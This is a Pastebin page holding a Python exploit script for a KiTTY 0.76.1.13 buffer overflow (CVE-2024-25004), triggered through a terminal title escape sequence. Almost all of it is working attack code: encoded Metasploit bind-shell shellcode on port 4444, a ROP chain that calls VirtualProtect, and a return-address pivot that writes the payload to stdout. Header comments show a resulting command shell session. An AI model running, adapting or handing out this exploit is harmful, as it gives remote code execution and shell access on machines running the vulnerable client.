Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
- # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
- # Vendor Homepage: https://github.com/cyd01/KiTTY/=
- # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
- # Version: ≤ 0.76.1.13
- # Tested on: Microsoft Windows 11/10/8/7/XP
- # CVE: CVE-2024-25004
- #-------------------------------------------------------------------------------------#
- # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
- #-------------------------------------------------------------------------------------#
- # msf6 payload(windows/shell_bind_tcp) > to_handler #
- # [*] Payload Handler Started as Job 1 #
- # msf6 payload(windows/shell_bind_tcp) > #
- # [*] Started bind TCP handler against 192.168.100.28:4444 #
- # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) #
- #-------------------------------------------------------------------------------------#
- import sys
- import os
- import struct
- #-------------------------------------------------------------------------------------#
- # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
- # windows/shell_bind_tcp - 355 bytes #
- # https://metasploit.com/ #
- # Encoder: x86/shikata_ga_nai #
- # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
- # PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
- # AutoVerifySession=true #
- #-------------------------------------------------------------------------------------#
- buf = b""
- buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
- buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
- buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
- buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
- buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
- buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
- buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
- buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
- buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
- buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
- buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
- buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
- buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
- buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
- buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
- buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
- buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
- buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
- buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
- buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
- buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
- buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
- buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
- buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
- buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
- buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
- buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
- buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
- buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
- buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
- def shellcode():
- sc = b''
- sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444
- sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444
- sc += b'\x29\xD8' # sub eax,ebx
- sc += b'\x29\xC4' # sub esp,eax
- sc += buf
- sc += b'\x90' * (1042-len(sc))
- assert len(sc) == 1042
- return sc
- def create_rop_chain():
- # rop chain generated with mona.py - www.corelan.be
- rop_gadgets = [
- #[---INFO:gadgets_to_set_esi:---]
- 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
- 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x41414141, # Filler (compensate)
- 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
- 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
- #[---INFO:gadgets_to_set_ebp:---]
- 0x00429953, # POP EBP # RETN [kitty.exe]
- 0x005405b0, # PUSH ESP; RETN 0 [kitty.exe]
- #[---INFO:gadgets_to_set_ebx:---]
- 0x0049d9f9, # POP EBX # RETN [kitty.exe]
- 0x00000201, # 0x00000201-> ebx
- #[---INFO:gadgets_to_set_edx:---]
- 0x00430dce, # POP EDX # RETN [kitty.exe]
- 0x00000040, # 0x00000040-> edx
- #[---INFO:gadgets_to_set_ecx:---]
- 0x005ac58c, # POP ECX # RETN [kitty.exe]
- 0x004d81d9, # &Writable location [kitty.exe]
- #[---INFO:gadgets_to_set_edi:---]
- 0x004fa404, # POP EDI # RETN [kitty.exe]
- 0x005a2001, # RETN (ROP NOP) [kitty.exe]
- #[---INFO:gadgets_to_set_eax:---]
- 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
- 0x90909090, # nop
- 0x41414141, # Filler (compensate)
- #[---INFO:pushad:---]
- 0x005dfbac, # PUSHAD # RETN [kitty.exe]
- ]
- return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
- rop_chain = create_rop_chain()
- #----------------------------------------------------------------------------------#
- # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d #
- # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : #
- # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
- # ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} #
- # Shellcode size at ESP: 1042 bytes #
- #----------------------------------------------------------------------------------#
- return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
- rop_chain_padding = b'\x90' * 27
- nops = b'\x90' * 88
- escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
- escape_sequence += rop_chain_padding + rop_chain
- escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
- escape_sequence += nops + b'\007'
- stdout = os.fdopen(sys.stdout.fileno(), 'wb')
- stdout.write(escape_sequence)
- stdout.flush()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement